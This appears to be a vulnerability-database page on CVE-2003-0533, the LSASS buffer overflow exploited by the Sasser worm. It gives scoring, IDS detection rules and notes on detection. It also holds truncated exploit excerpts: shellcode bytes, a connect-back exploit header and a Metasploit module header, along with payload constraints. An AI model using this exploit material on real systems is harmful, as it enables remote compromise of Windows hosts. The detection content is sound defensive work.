CVE-2003-0533
published 2004-06-01CVE-2003-0533: Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft…
PriorityP275high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
86.15%
99.7th percentile
Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_nt | — | — |
Detection & IOCsextracted from sources · hover to see the quote
port135
bytes
j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|
snort
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC LSASS bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|05|"; depth:1; content:"|00|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102507; rev:10; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, updated_at 2024_03_14;)
bytes↗
\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF
bytes↗
\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF
- →Detect DCERPC bind attempts to the LSASS interface UUID 3919286a-b10c-11d0-9ba8-00c04fd92ef5 over ncacn_np \lsarpc on TCP port 135 or 445; the LSASS RPC UUID bytes 6a 28 19 39 0c b1 d0 11 9b a8 00 c0 4f d9 2e f5 appear in the bind request and are a reliable signature.
- →Exploit establishes a null SMB session to IPC$ before invoking the vulnerable RPC call; alert on unauthenticated WNetAddConnection2 / null-session IPC$ connections followed by DCERPC activity to lsarpc. ↗
- →The Metasploit module uses DCERPC call opnum 9 on the lsarpc pipe; alert on DCERPC requests with opnum 9 to the LSASS interface UUID. ↗
- →Payload bad characters for this exploit are \x00\x0a\x0d\x5c\x5f\x2f\x2e; shellcode in the wild will avoid these bytes. Reverse-shell shellcode starts with the distinctive stub EB 10 5B 4B 33 C9 66 B9 25 01; bind-shell shellcode starts with EB 10 5A 4A 33 C9 66 B9 7D 01. ↗
- →The Sasser worm exploited this vulnerability; monitor for lsass.exe spawning unexpected child processes or network connections, and for abnormal writes to DCPROMO.LOG. ↗
- →DCERPC request fragmentation (FragSize parameter) may be used to evade length-based detection; inspect reassembled DCERPC streams rather than individual fragments. ↗
- ·The exploit requires two runs against Windows XP targets due to memory layout differences; a single failed attempt should not be treated as a definitive miss. ↗
- ·The exploit payload space is limited to 1024 bytes with a stack adjustment of -3500; staged payloads or large shellcode will not fit without modification. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-36fg-2gj3-qpvv: Stack-based buffer overflow in certain Active Directory service functions in LSASRV
ghsa_unreviewed·2022-04-29
CVE-2003-0533 [HIGH] GHSA-36fg-2gj3-qpvv: Stack-based buffer overflow in certain Active Directory service functions in LSASRV
Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm.
VulnCheck
Microsoft netmeeting Out-of-bounds Write
vulncheck·2003·CVSS 7.5
CVE-2003-0533 [HIGH] Microsoft netmeeting Out-of-bounds Write
Microsoft netmeeting Out-of-bounds Write
Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm.
Affected: Microsoft netmeeting
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.broadcom.com/support/security-center/attacksignatures/deta
Suricata
GPL NETBIOS DCERPC LSASS bind attempt
suricata·2010-09-23
CVE-2003-0533 GPL NETBIOS DCERPC LSASS bind attempt
GPL NETBIOS DCERPC LSASS bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC LSASS bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|05|"; depth:1; content:"|00|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102507; rev:10; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, updated_at 2024_03_14;)
Suricata
GPL NETBIOS SMB-DS DCERPC LSASS direct bind attempt
suricata·2010-09-23
CVE-2003-0533 GPL NETBIOS SMB-DS DCERPC LSASS direct bind attempt
GPL NETBIOS SMB-DS DCERPC LSASS direct bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS direct bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102526; rev:9; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, updated_at 2024_03_14;)
Suricata
GPL NETBIOS SMB DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt
suricata·2010-09-23
CVE-2003-0533 GPL NETBIOS SMB DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt
GPL NETBIOS SMB DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt"; flow:established,to_server; flowbits:isset,netbios.lsass.bind.attempt; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; distance:59; content:"|00|"; within:1; distance:1; content:"|09 00|"; within:2; distance:19; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:attempted-admin; sid:2102511; rev:11; metadata:created_at 2010_09_23, cve CVE_2003_0533, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL NETBIOS SMB-DS DCERPC LSASS unicode bind attempt
suricata·2010-09-23
CVE-2003-0533 GPL NETBIOS SMB-DS DCERPC LSASS unicode bind attempt
GPL NETBIOS SMB-DS DCERPC LSASS unicode bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS unicode bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 05 00 0B|"; within:15; distance:4; byte_test:1,&,16,1,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102513; rev:10; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium,
Suricata
GPL NETBIOS DCERPC LSASS direct bind attempt
suricata·2010-09-23
CVE-2003-0533 GPL NETBIOS DCERPC LSASS direct bind attempt
GPL NETBIOS DCERPC LSASS direct bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC LSASS direct bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102524; rev:10; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, updated_at 2024_03_14;)
Suricata
GPL NETBIOS SMB-DS DCERPC LSASS bind attempt
suricata·2010-09-23
CVE-2003-0533 GPL NETBIOS SMB-DS DCERPC LSASS bind attempt
GPL NETBIOS SMB-DS DCERPC LSASS bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; distance:2; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102512; rev:10; metadata:created_at 2010_09_23, cve C
Suricata
GPL NETBIOS SMB DCERPC LSASS bind attempt
suricata·2010-09-23
CVE-2003-0533 GPL NETBIOS SMB DCERPC LSASS bind attempt
GPL NETBIOS SMB DCERPC LSASS bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00 0B|"; within:10; distance:4; byte_test:1,&,16,1,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102510; rev:10; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_se
Suricata
GPL NETBIOS SMB DCERPC LSASS direct bind attempt
suricata·2010-09-23
CVE-2003-0533 GPL NETBIOS SMB DCERPC LSASS direct bind attempt
GPL NETBIOS SMB DCERPC LSASS direct bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS direct bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102525; rev:9; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_14
Exploit-DB
Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)
exploitdb·2010-07-03
CVE-2003-0533 Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)
Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)
---
##
# $Id: ms04_011_lsass.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the LSASS service, this vulnerability
was originally found by eEye. When re-exploiting a Windows XP system, you will need
need to run this module twice. DCERPC request fragmentation can be performed by setting
Exploit-DB
Microsoft Windows XP/2000 - 'Lsasrv.dll' Remote Universal (MS04-011)
exploitdb·2004-04-29
CVE-2003-0533 Microsoft Windows XP/2000 - 'Lsasrv.dll' Remote Universal (MS04-011)
Microsoft Windows XP/2000 - 'Lsasrv.dll' Remote Universal (MS04-011)
---
/* HOD-ms04011-lsasrv-expl.c:
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit
* Version 0.1 coded by
*
*
* .::[ houseofdabus ]::.
*
*
* -------------------------------------------------------------------
* Usage:
*
* expl [connectback IP] [options]
*
* Targets:
* 0 [0x01004600]: WinXP Professional [universal] lsass.exe
* 1 [0x7515123c]: Win2k Professional [universal] netrap.dll
* 2 [0x751c123c]: Win2k Advanced Server [SP4] netrap.dll
*
* Options:
* -t: Detect remote OS:
* Windows 5.1 - WinXP
* Windows 5.0 - Win2k
* -------------------------------------------------------------------
*
* Tested on
* - Windows XP Professional SP0 English version
* - Windows XP Professional SP0 Russian version
* - Windows XP P
Exploit-DB
Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)
exploitdb·2004-04-24
CVE-2003-0533 Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)
Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)
---
#include
#pragma comment(lib,"mpr.lib")
#pragma comment(lib, "ws2_32")
unsigned char scode[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D"
"\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\x
Metasploit
MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
metasploit
MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
This module exploits a stack buffer overflow in the LSASS service, this vulnerability was originally found by eEye. When re-exploiting a Windows XP system, you will need need to run this module twice. DCERPC request fragmentation can be performed by setting 'FragSize' parameter.
arXiv
The MalSource Dataset: Quantifying Complexity and Code Reuse in Malware Development
arxiv_fulltext·2018-11-16
The MalSource Dataset: Quantifying Complexity and Code Reuse in Malware Development
3.5pt
The MalSource Dataset: Quantifying Complexity and Code Reuse in Malware Development
Alejandro Calleja, Juan Tapiador, and Juan Caballero
A. Calleja and J. Tapiador are with the
Department of Computer Science, Universidad Carlos III de Madrid, 28911 Leganes, Madrid, Spain.
E-mail: \accortin, jestevez\@inf.uc3m.es.
J. Caballero is with the IMDEA Software Institute, Madrid, Spain.
E-mail: [email protected].
## Abstract
During the last decades, the problem of malicious and unwanted
software (malware) has surged in numbers and sophistication.
Malware plays a key role in most of today's cyber attacks and
has consolidated as a commodity in the underground economy.
In this work, we analyze the evolution of malware from 1975
to date from a software engineering perspective.
We anal
CTF
README
ctf_writeups
README
# CTF Writeups
Welcome to my CTF Writeups repository! Here, I document the solutions and methodologies used to solve various Capture The Flag (CTF) challenges. This repository is intended to serve as a learning resource for others interested in cybersecurity and CTF competitions.
Capture The Flag (CTF) competitions are a popular way to practice and improve cybersecurity skills. These competitions present various challenges that require problem-solving, creativity, and technical knowledge.
## Writeups
The writeups in this repository (located in the "writeups" folder) are categorised based on the nature of the challenge. Each writeup provides step-by-step solutions, along with explanations of the tools and techniques used. The difficulty rating associated with each challenge matches the dif
http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/020069.htmlhttp://marc.info/?l=bugtraq&m=108325860431471&w=2http://www.ciac.org/ciac/bulletins/o-114.shtmlhttp://www.eeye.com/html/Research/Advisories/AD20040413C.htmlhttp://www.kb.cert.org/vuls/id/753212http://www.securityfocus.com/bid/10108http://www.us-cert.gov/cas/techalerts/TA04-104A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-011https://exchange.xforce.ibmcloud.com/vulnerabilities/15699https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A883https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A898https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A919http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/020069.htmlhttp://marc.info/?l=bugtraq&m=108325860431471&w=2http://www.ciac.org/ciac/bulletins/o-114.shtmlhttp://www.eeye.com/html/Research/Advisories/AD20040413C.htmlhttp://www.kb.cert.org/vuls/id/753212http://www.securityfocus.com/bid/10108http://www.us-cert.gov/cas/techalerts/TA04-104A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-011https://exchange.xforce.ibmcloud.com/vulnerabilities/15699https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A883https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A898https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A919
2004-06-01
Published
Exploited in the wild